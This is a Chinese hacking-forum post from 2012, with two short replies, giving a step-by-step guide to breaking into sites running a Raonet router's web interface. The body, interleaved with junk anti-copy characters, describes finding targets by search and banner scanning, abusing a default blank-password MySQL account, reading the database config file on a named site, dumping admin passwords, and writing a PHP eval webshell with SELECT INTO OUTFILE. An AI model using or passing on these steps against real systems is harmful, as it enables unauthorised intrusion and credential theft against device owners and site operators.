找回密码
 立即注册
查看: 3917|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
2 L- j6 E5 G" O7 z- a7 r2 E( R
6 J2 s) }: h" s* s1 m* J+ j1:google搜索'Raonet Subscriber Ethernet Router'
9 q1 s+ u) X) Y* b( q( f
4 |, T( D  U& j6 H2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001  i8 s" R6 ?7 K2 u1 Y- l5 m

% l2 L1 j& {2 B) H+ ^) M3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。$ G1 Z& i: V# N: d
7 q! |- h: Y4 m, ?- m
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
+ y; i# s1 v! n  t' x0 d
2 g# `- s& j' F& D 2 i( x0 G' w3 K1 m; ^

  S( Z) r* x5 W' I  b! V, ~, W1 E入侵步骤:& U0 N/ j+ W% P4 m8 ^; D6 o
; c0 X! A# i/ L5 g
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
8 A- n3 M; Y. U5 z  W& |9 O% H; r' S6 E8 z
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc+ e0 G( T8 t3 K4 z* j* ?! s% Z# v
3:得到密码后连接,查看GUI管理密码:% U" a6 E3 k! T* q  R, I
use ser_500" A1 o- c% {1 Q5 \) Y7 b9 C4 S
select id,passwd from user;! T1 ?6 {, F4 r
4:通过数据库写入webshell,执行命令:
. [# g& H. w* ], o0 E( ]use mysql;
) f& K5 j) D0 @% \+ u) p7 }create table ok(cmd TEXT);1 q# D3 e4 o2 \8 D* J0 z
insert into ok values("<?php @eval($_POST[cmd])?>");
$ x3 E- K! q1 g! J. d% x. Z1 Pselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
7 L0 N4 w; Q  G4 m+ wdrop table ok;# v" {3 J/ M; \2 A
! f' i% v% O+ J
5:连接后门shell.php 2 p$ w/ J1 E/ \# ], P6 X: z
- ?0 @$ {% Y# L6 X
6. 搞定!& u4 ^' M4 N: t) E' h( b/ Y) I& r
, k) O1 r% |+ ]2 h8 e* f
回复

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表